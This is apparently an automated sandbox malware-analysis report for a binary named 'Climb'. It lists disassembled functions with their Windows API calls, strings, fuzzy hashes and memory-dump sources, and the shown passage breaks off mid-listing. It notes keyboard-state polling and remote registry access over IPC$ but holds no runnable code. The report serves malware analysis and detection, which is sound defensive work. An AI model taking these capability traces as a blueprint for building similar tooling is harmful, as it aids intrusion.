Opcode Fuzzy Hash: a7b7c49de584378cc398515626d7c7df7c61cb45688a8ec2f837b37da3c3bfa4
Instruction Fuzzy Hash: 39615E31501711DFDB36DF58D948B3ABBB2FB81312F288529E443976B0CB75A891DB81

Function 00A62128 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00A62234: GetWindowLongW.USER32(?,000000EB), ref: 00A62242

GetSysColor.USER32(0000000F), ref: 00A62152

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 05ab543e89b0ccba6e885e68577599d7bcca0884e3a8672a41c9a1468700ab96
Instruction ID: 552126fbe35cb04522ca7a71909522c34431c5548281073e72e5404704681ad2
Opcode Fuzzy Hash: 05ab543e89b0ccba6e885e68577599d7bcca0884e3a8672a41c9a1468700ab96
Instruction Fuzzy Hash: 4C41B471104A40AFDF219FB89C48BBA3B76AB47331F154359FAA68B2E1C7319D42DB10

Function 00ACA05C Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00AB0D31,00000001,0000138C,00000001,00000000,00000001,?,00ADEEAE,00B32430), ref: 00ACA091
LoadStringW.USER32(00000000,?,00AB0D31,00000001), ref: 00ACA09A

Part of subcall function 00A6B329: _wcslen.LIBCMT ref: 00A6B333

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00AB0D31,00000001,0000138C,00000001,00000000,00000001,?,00ADEEAE,00B32430,?), ref: 00ACA0BC
LoadStringW.USER32(00000000,?,00AB0D31,00000001), ref: 00ACA0BF
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00ACA1E0

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00ACA1C4
Error: , xrefs: 00ACA197
^ ERROR, xrefs: 00ACA175
Line %d (File "%s"):, xrefs: 00ACA109
Line %d:, xrefs: 00ACA11A

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: 54a182f3a492848346cf9a4e95c363596937f9befee3e5c6ee75172aa1e0837c
Instruction ID: 42c09eb919bae1e9964265a334660ca38d6ffd8dfd2889c73eee15e9f7db9899
Opcode Fuzzy Hash: 54a182f3a492848346cf9a4e95c363596937f9befee3e5c6ee75172aa1e0837c
Instruction Fuzzy Hash: B7415F7290021DAACB05FBE0DE46EEEB778AF18704F104165F505B61A2EF356F49CB61

Function 00AC0FCF Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00A68577: _wcslen.LIBCMT ref: 00A6858A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00AC1093
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00AC10AF
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00AC10CB
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00AC10F5
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00AC111D
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00AC1128
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00AC112D

Strings

\CLSID, xrefs: 00AC1015
SOFTWARE\Classes\, xrefs: 00AC0FFF
\IPC$, xrefs: 00AC1075

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: 88690c34cb9f6ac1b34a41e9bcdfa900cbd05b8171d45f05fb998e010bf9b48b
Instruction ID: 757bf13a60cbdfec62ef1a2a5326d11a9738eeb38a63e79f59f326ccfc731523
Opcode Fuzzy Hash: 88690c34cb9f6ac1b34a41e9bcdfa900cbd05b8171d45f05fb998e010bf9b48b
Instruction Fuzzy Hash: 6D410A72D10129EBCF22EBA4DC45DEEB7B8FF08740F054169E901A3161EB359E45CB60

Function 00AF4A34 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00AF4AD9
CreateCompatibleDC.GDI32(00000000), ref: 00AF4AE0
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00AF4AF3
SelectObject.GDI32(00000000,00000000), ref: 00AF4AFB
GetPixel.GDI32(00000000,00000000,00000000), ref: 00AF4B06
DeleteDC.GDI32(00000000), ref: 00AF4B10
GetWindowLongW.USER32(?,000000EC), ref: 00AF4B1A
SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00AF4B30
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00AF4B3C

Strings

static, xrefs: 00AF4A71

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: d102068538d76c04234e222747f1293d029574c1f01f257aa6eee26501d13a0d
Instruction ID: dbc7c02122eb08a0d20303acbda19711973b0469c193fdd38fb702b0cf66c9b3
Opcode Fuzzy Hash: d102068538d76c04234e222747f1293d029574c1f01f257aa6eee26501d13a0d
Instruction Fuzzy Hash: E6311832100219ABDF229FE4DC09FEA3BAAFF0D364F110211FA55A61A0C775D861DB94

Function 00AE468D Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00AE46B9
CoInitialize.OLE32(00000000), ref: 00AE46E7
CoUninitialize.OLE32 ref: 00AE46F1
_wcslen.LIBCMT ref: 00AE478A
GetRunningObjectTable.OLE32(00000000,?), ref: 00AE480E
SetErrorMode.KERNEL32(00000001,00000029), ref: 00AE4932
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00AE496B
CoGetObject.OLE32(?,00000000,00B00B64,?), ref: 00AE498A
SetErrorMode.KERNEL32(00000000), ref: 00AE499D
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00AE4A21
VariantClear.OLEAUT32(?), ref: 00AE4A35

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: 9cf17f23936112211f48ed4beca9e24147adc287bf236974a1636788ee0e9f82
Instruction ID: 2d565279c2afd8d454459411a9705364b4180a7c0b8c8462e995525975aa4b21
Opcode Fuzzy Hash: 9cf17f23936112211f48ed4beca9e24147adc287bf236974a1636788ee0e9f82
Instruction Fuzzy Hash: 52C146716083459FD700DF69C88492BBBE9FF89748F00495DF98A9B251DB31ED06CB92

Function 00AD84DB Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00AD8538
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00AD85D4
SHGetDesktopFolder.SHELL32(?), ref: 00AD85E8
CoCreateInstance.OLE32(00B00CD4,00000000,00000001,00B27E8C,?), ref: 00AD8634
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00AD86B9
CoTaskMemFree.OLE32(?,?), ref: 00AD8711
SHBrowseForFolderW.SHELL32(?), ref: 00AD879C
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00AD87BF
CoTaskMemFree.OLE32(00000000), ref: 00AD87C6
CoTaskMemFree.OLE32(00000000), ref: 00AD881B
CoUninitialize.OLE32 ref: 00AD8821

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: 8ea09552359827eb9f4f6221ce9fb7e7985db18c5fd19dce6e87422e104e5ffc
Instruction ID: 7a0a8c3e018122b04a4283f48eed335506ce00b219495b6cb63cf8c84a2ad190
Opcode Fuzzy Hash: 8ea09552359827eb9f4f6221ce9fb7e7985db18c5fd19dce6e87422e104e5ffc
Instruction Fuzzy Hash: 09C12B75A00105AFCB14DFA4C888DAEBBF9FF48344B148599E41ADB361DB34ED42CB90

Function 00AC0378 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00AC039F
SafeArrayAllocData.OLEAUT32(?), ref: 00AC03F8
VariantInit.OLEAUT32(?), ref: 00AC040A
SafeArrayAccessData.OLEAUT32(?,?), ref: 00AC042A
VariantCopy.OLEAUT32(?,?), ref: 00AC047D
SafeArrayUnaccessData.OLEAUT32(?), ref: 00AC0491
VariantClear.OLEAUT32(?), ref: 00AC04A6
SafeArrayDestroyData.OLEAUT32(?), ref: 00AC04B3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00AC04BC
VariantClear.OLEAUT32(?), ref: 00AC04CE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00AC04D9

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 8033b0cc57280645e7dff815900262e1e8244a472e7353b6b5bd4e79eb73b77f
Instruction ID: 7233823a42f1f878c643c2e153966b10f22d4fb1145f64b814d9a7ac5203be9b
Opcode Fuzzy Hash: 8033b0cc57280645e7dff815900262e1e8244a472e7353b6b5bd4e79eb73b77f
Instruction Fuzzy Hash: C3418435A00219DFCB15DFA8D944EAE7BB9FF08345F018429E955AB261C730A946CF90

Function 00ACA635 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00ACA65D
GetAsyncKeyState.USER32(000000A0), ref: 00ACA6DE
GetKeyState.USER32(000000A0), ref: 00ACA6F9
GetAsyncKeyState.USER32(000000A1), ref: 00ACA713
GetKeyState.USER32(000000A1), ref: 00ACA728
GetAsyncKeyState.USER32(00000011), ref: 00ACA740
GetKeyState.USER32(00000011), ref: 00ACA752
GetAsyncKeyState.USER32(00000012), ref: 00ACA76A
GetKeyState.USER32(00000012), ref: 00ACA77C
GetAsyncKeyState.USER32(0000005B), ref: 00ACA794
GetKeyState.USER32(0000005B), ref: 00ACA7A6

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: d022fd382e5a6c726918c5a6e798e4e1bbf6b0aac0b83e83059a45f6220003da
Instruction ID: cb38adc3add5334c18c1bf0164310c4a855fed083c91463adf002efadc400685
Opcode Fuzzy Hash: d022fd382e5a6c726918c5a6e798e4e1bbf6b0aac0b83e83059a45f6220003da
Instruction Fuzzy Hash: AA41B0645047CD69FF3197A48904BB5BEB17B3130CF0A805DD5C69A2C2EBA499C8C7A3

Function 00AE9730 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 00AE9750

Part of subcall function 00AC9805: _wcslen.LIBCMT ref: 00AC9828

_wcslen.LIBCMT ref: 00AE97AB
_wcslen.LIBCMT ref: 00AE97F9
_wcslen.LIBCMT ref: 00AE9839
_wcslen.LIBCMT ref: 00AE98CB

Strings

winapi, xrefs: 00AE97F3, 00AE97F8
stdcall, xrefs: 00AE9833, 00AE9838
cdecl, xrefs: 00AE97A5, 00AE97AA
none, xrefs: 00AE98C2, 00AE98C7

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: b95e8b8514199d709c1bc48449697cc0e171d9dda131aa2cc41961bd05a6f47f
Instruction ID: 70504df440cadbfb9dfd69352e211f30718982b0205e6fe58b54e9444f3cb433
Opcode Fuzzy Hash: b95e8b8514199d709c1bc48449697cc0e171d9dda131aa2cc41961bd05a6f47f
Instruction Fuzzy Hash: B651E432A006569BCF14EFAEC9509BFB7F5BF25360B204229E826E7291DB31DD40C790

Function 00AE4189 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00AE41D1
CoUninitialize.OLE32 ref: 00AE41DC
CoCreateInstance.OLE32(?,00000000,00000017,00B00B44,?), ref: 00AE4236
IIDFromString.OLE32(?,?), ref: 00AE42A9
VariantInit.OLEAUT32(?), ref: 00AE4341
VariantClear.OLEAUT32(?), ref: 00AE4393

Strings

NULL Pointer assignment, xrefs: 00AE427B
Failed to create object, xrefs: 00AE4241, 00AE42F7
Invalid parameter, xrefs: 00AE42C2

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: e24e6bb2b6969ea7a39ea45f0cd747f0acadb54a4b90695db38c0319a6388103
Instruction ID: 946b49241e4ba525a43a9ad74f55438d372b341005f3180ac8b6781a7afb1932
Opcode Fuzzy Hash: e24e6bb2b6969ea7a39ea45f0cd747f0acadb54a4b90695db38c0319a6388103
Instruction Fuzzy Hash: DB61BD71608341EFC310DFA5D988FAEBBE8AF49714F004949F9859B2A1CB70ED44CB92

Function 00AD8BDA Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00AD8C9C
SystemTimeToFileTime.KERNEL32(?,?), ref: 00AD8CAC
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00AD8CB8
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00AD8D55
SetCurrentDirectoryW.KERNEL32(?), ref: 00AD8D69
SetCurrentDirectoryW.KERNEL32(?), ref: 00AD8D9B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00AD8DD1
SetCurrentDirectoryW.KERNEL32(?), ref: 00AD8DDA

Strings

*.*, xrefs: 00AD8DE0

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: bdbed8feee284eda7c435d2edb66608682f6234634dad8a0204324399a2b2644
Instruction ID: d0fa9fcc6ac89f6a96da4775a8d4df21ab12890391631260ba4693c1dca9d079
Opcode Fuzzy Hash: bdbed8feee284eda7c435d2edb66608682f6234634dad8a0204324399a2b2644
Instruction Fuzzy Hash: FF617B765043059FCB10EF64C944AAEB3F9FF89310F04491EF99A87291EB35E945CB92

Function 00AF46E2 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 00AF4715
SetMenu.USER32(?,00000000), ref: 00AF4724
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AF47AC
IsMenu.USER32(?), ref: 00AF47C0
CreatePopupMenu.USER32 ref: 00AF47CA
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00AF47F7
DrawMenuBar.USER32 ref: 00AF47FF

Strings

0, xrefs: 00AF46F0
F, xrefs: 00AF47EA

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: c5ac7e204afcbf4b0b2d7d9a5171fac9299f74419f88e1c6e39c25bd0496fa2e
Instruction ID: 444c9dea9b72e716a103e144cb55848e11eceac44d7c4576b13cdee7d05dadbc
Opcode Fuzzy Hash: c5ac7e204afcbf4b0b2d7d9a5171fac9299f74419f88e1c6e39c25bd0496fa2e
Instruction Fuzzy Hash: 8F415775A01209EFDB24DFA8D888EBA7BB6FF49354F144028FA45A7360D770A915CB90

Function 00AC282C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A6B329: _wcslen.LIBCMT ref: 00A6B333

Part of subcall function 00AC45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00AC4620

SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00AC28B1
GetDlgCtrlID.USER32 ref: 00AC28BC
GetParent.USER32 ref: 00AC28D8
SendMessageW.USER32(00000000,?,00000111,?), ref: 00AC28DB
GetDlgCtrlID.USER32(?), ref: 00AC28E4
GetParent.USER32(?), ref: 00AC28F8
SendMessageW.USER32(00000000,?,00000111,?), ref: 00AC28FB

Strings

ComboBox, xrefs: 00AC2839
ListBox, xrefs: 00AC286E

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
Opcode ID: 4fe8eb2d6de36c1be041f952b27399afaad95975efa2a9c706eb292942988330
Instruction ID: 835b61c1dc64087c7a672b7d85a773afdecb96305d12fe72c1a4f3c1a58eb56c
Opcode Fuzzy Hash: 4fe8eb2d6de36c1be041f952b27399afaad95975efa2a9c706eb292942988330
Instruction Fuzzy Hash: 0221BE74A00118BBCF01EFE0CC85EFEBBB9EF09310F00015AB961A72A1DB354849DB60

Function 00AC290D Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A6B329: _wcslen.LIBCMT ref: 00A6B333

Part of subcall function 00AC45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00AC4620

SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00AC2990
GetDlgCtrlID.USER32 ref: 00AC299B
GetParent.USER32 ref: 00AC29B7
SendMessageW.USER32(00000000,?,00000111,?), ref: 00AC29BA
GetDlgCtrlID.USER32(?), ref: 00AC29C3
GetParent.USER32(?), ref: 00AC29D7
SendMessageW.USER32(00000000,?,00000111,?), ref: 00AC29DA

Strings

ComboBox, xrefs: 00AC291A
ListBox, xrefs: 00AC294F

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
Opcode ID: 2fba00aad7772c0de59c46df1647e98b93e1ab6aeb3cfaf3252e26fac08ac21c
Instruction ID: 8ed7e111c1a850abafb3075d91a56af20d83013e8a7a0c9ef74ec1f166203580
Opcode Fuzzy Hash: 2fba00aad7772c0de59c46df1647e98b93e1ab6aeb3cfaf3252e26fac08ac21c
Instruction Fuzzy Hash: 89219D75A00118BBDF11EBA0DC85FFEBBB9EF09300F00405AB961A72A1DB758849DB60

Function 00AF44BF Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00AF4539
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00AF453C
GetWindowLongW.USER32(?,000000F0), ref: 00AF4563
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00AF4586
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00AF45FE
